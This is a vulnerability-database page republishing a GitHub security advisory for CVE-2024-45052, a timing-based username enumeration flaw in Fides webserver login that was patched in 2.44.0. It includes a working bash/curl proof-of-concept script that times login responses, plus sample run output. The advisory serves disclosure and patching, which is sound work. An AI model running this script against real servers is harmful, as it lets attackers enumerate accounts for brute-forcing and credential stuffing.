Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

github логотип

GHSA-2h46-8gf5-fmxv

Опубликовано: 04 сент. 2024
Источник: github
Github: Прошло ревью

Описание

Timing-Based Username Enumeration Vulnerability in Fides Webserver Authentication

A timing-based username enumeration vulnerability has been identified in Fides Webserver authentication. This vulnerability allows an unauthenticated attacker to determine the existence of valid usernames by analyzing the time it takes for the server to respond to login requests. The discrepancy in response times between valid and invalid usernames can be leveraged to enumerate users on the system.

Impact

This vulnerability enables a timing-based username enumeration attack. An attacker can systematically guess and verify which usernames are valid by measuring the server's response time to authentication requests. This information can be used to conduct further attacks on authentication such as password brute-forcing and credential stuffing.

Patches

The vulnerability has been patched in Fides version 2.44.0. Users are advised to upgrade to this version or later to secure their systems against this threat.

Workarounds

There are no workarounds.

Proof of Concept

  1. Create a valid user called valid_user on a remote Fides server. Ensure that there is no user on the server named invalid_user. Note that this vulnerability is not reproducible on a local deployment due to the extremely low latency of responses to login requests.
  2. In a terminal run export LOGIN_URL='https://example.com/api/v1/login', replacing example.com with your remote Fides server's domain or IP address.
  3. In the same terminal run exploit-poc.sh (detailed below).
  4. It's possible to distinguish between valid and invalid users based on the low latency (time difference) for invalid users.
Exploit PoC script
#!/bin/bash # Function to test login and calculate average transfer times test_login(){ echo -e "\nTesting login for user: $1\n" total_diff=0 for (( i=1; i <= 20; ++i )) do echo -n "Attempt #$i: " resp=$(curl -w @- "$LOGIN_URL" \ -H 'content-type: application/json' \ --data-raw '{"username":"'$1'","password":"d3JvbmdwYXNzd29yZA=="}' \ -o /dev/null -s <<'EOF' { "pretransfer": %{time_pretransfer}, "starttransfer": %{time_starttransfer} } EOF ) pre=$(echo $resp | jq '.pretransfer') start=$(echo $resp | jq '.starttransfer') diff=$(echo "$start - $pre" | bc) # Accumulate total diff total_diff=$(echo "$total_diff + $diff" | bc) # Print the result of this iteration printf "Pretransfer: %.4f, Starttransfer: %.4f, Diff: %.4f\n" "$pre" "$start" "$diff" done # Calculate average diff avg_diff=$(echo "scale=4; $total_diff / 20" | bc) # Print average time echo -e "\nAverage Time Difference for $1: $avg_diff seconds\n" } # Ensure that LOGIN_URL is set if [ -z "$LOGIN_URL" ]; then echo "Error: LOGIN_URL environment variable is not set." exit 1 fi # Test valid and invalid users test_login valid_user test_login invalid_user
Sample script run
~ ❯ ./exploit-poc.sh Testing login for user: valid_user Attempt #1: Pretransfer: 0.3006, Starttransfer: 0.7404, Diff: 0.4398 Attempt #2: Pretransfer: 0.2755, Starttransfer: 1.2506, Diff: 0.9751 Attempt #3: Pretransfer: 0.2595, Starttransfer: 0.7108, Diff: 0.4512 Attempt #4: Pretransfer: 0.2551, Starttransfer: 1.0483, Diff: 0.7932 Attempt #5: Pretransfer: 0.2553, Starttransfer: 0.6680, Diff: 0.4127 Attempt #6: Pretransfer: 0.2599, Starttransfer: 0.6712, Diff: 0.4113 Attempt #7: Pretransfer: 0.2518, Starttransfer: 0.6603, Diff: 0.4085 Attempt #8: Pretransfer: 0.2467, Starttransfer: 0.6812, Diff: 0.4344 Attempt #9: Pretransfer: 0.2502, Starttransfer: 0.8175, Diff: 0.5673 Attempt #10: Pretransfer: 0.2583, Starttransfer: 0.6904, Diff: 0.4321 Attempt #11: Pretransfer: 0.2573, Starttransfer: 0.6601, Diff: 0.4029 Attempt #12: Pretransfer: 0.2481, Starttransfer: 0.8495, Diff: 0.6014 Attempt #13: Pretransfer: 0.2487, Starttransfer: 0.6822, Diff: 0.4336 Attempt #14: Pretransfer: 0.2526, Starttransfer: 0.9728, Diff: 0.7201 Attempt #15: Pretransfer: 0.2573, Starttransfer: 0.9808, Diff: 0.7235 Attempt #16: Pretransfer: 0.2459, Starttransfer: 0.6536, Diff: 0.4078 Attempt #17: Pretransfer: 0.2508, Starttransfer: 0.9024, Diff: 0.6517 Attempt #18: Pretransfer: 0.2477, Starttransfer: 2.2049, Diff: 1.9572 Attempt #19: Pretransfer: 0.2523, Starttransfer: 2.1087, Diff: 1.8564 Attempt #20: Pretransfer: 0.2523, Starttransfer: 0.7308, Diff: 0.4785 Average Time Difference for valid_user: .6779 seconds Testing login for user: invalid_user Attempt #1: Pretransfer: 0.2496, Starttransfer: 0.4122, Diff: 0.1626 Attempt #2: Pretransfer: 0.2551, Starttransfer: 0.4049, Diff: 0.1498 Attempt #3: Pretransfer: 0.2480, Starttransfer: 0.6174, Diff: 0.3694 Attempt #4: Pretransfer: 0.2489, Starttransfer: 0.4611, Diff: 0.2122 Attempt #5: Pretransfer: 0.2513, Starttransfer: 0.4601, Diff: 0.2088 Attempt #6: Pretransfer: 0.2540, Starttransfer: 0.3946, Diff: 0.1406 Attempt #7: Pretransfer: 0.2504, Starttransfer: 0.9104, Diff: 0.6599 Attempt #8: Pretransfer: 0.2577, Starttransfer: 0.4095, Diff: 0.1518 Attempt #9: Pretransfer: 0.2497, Starttransfer: 0.3851, Diff: 0.1353 Attempt #10: Pretransfer: 0.2548, Starttransfer: 0.4024, Diff: 0.1476 Attempt #11: Pretransfer: 0.2559, Starttransfer: 0.4002, Diff: 0.1443 Attempt #12: Pretransfer: 0.2501, Starttransfer: 0.4075, Diff: 0.1573 Attempt #13: Pretransfer: 0.2560, Starttransfer: 0.3921, Diff: 0.1361 Attempt #14: Pretransfer: 0.2493, Starttransfer: 0.3933, Diff: 0.1440 Attempt #15: Pretransfer: 0.2493, Starttransfer: 0.3942, Diff: 0.1449 Attempt #16: Pretransfer: 0.2599, Starttransfer: 0.5111, Diff: 0.2512 Attempt #17: Pretransfer: 0.2455, Starttransfer: 0.4128, Diff: 0.1673 Attempt #18: Pretransfer: 0.2558, Starttransfer: 1.7535, Diff: 1.4977 Attempt #19: Pretransfer: 0.2515, Starttransfer: 1.4528, Diff: 1.2013 Attempt #20: Pretransfer: 0.2483, Starttransfer: 0.3893, Diff: 0.1410 Average Time Difference for invalid_user: .3161 seconds ~ ❯

Severity

This vulnerability has been assigned a severity of LOW.

Using CVSS v3.1 it could be scored asAV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (5.3 Medium/Moderate) or AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N (0.0 None) depending on the Confidentiality impact metric used.

In Bugcrowd's vulnerability rating taxonomy it most likely be assigned a technical severity of P4 (Low) Broken Access Control (BAC) > Username/Email Enumeration > Non-Brute Force.

Ссылки

Пакеты

Наименование

ethyca-fides

pip
Затронутые версииВерсия исправления

< 2.44.0

2.44.0

EPSS

Процентиль: 49%
0.00262
Низкий

CVE ID

CVE-2024-45052

Дефекты

CWE-208

Связанные уязвимости

nvd логотип

CVE-2024-45052

CVSS3: 5.3
nvd
больше 1 года назад

Fides is an open-source privacy engineering platform. Prior to version 2.44.0, a timing-based username enumeration vulnerability exists in Fides Webserver authentication. This vulnerability allows an unauthenticated attacker to determine the existence of valid usernames by analyzing the time it takes for the server to respond to login requests. The discrepancy in response times between valid and invalid usernames can be leveraged to enumerate users on the system. This vulnerability enables a timing-based username enumeration attack. An attacker can systematically guess and verify which usernames are valid by measuring the server's response time to authentication requests. This information can be used to conduct further attacks on authentication such as password brute-forcing and credential stuffing. The vulnerability has been patched in Fides version `2.44.0`. Users are advised to upgrade to this version or later to secure their systems against this threat. There are no workarounds.

EPSS

Процентиль: 49%
0.00262
Низкий

CVE ID

CVE-2024-45052

Дефекты

CWE-208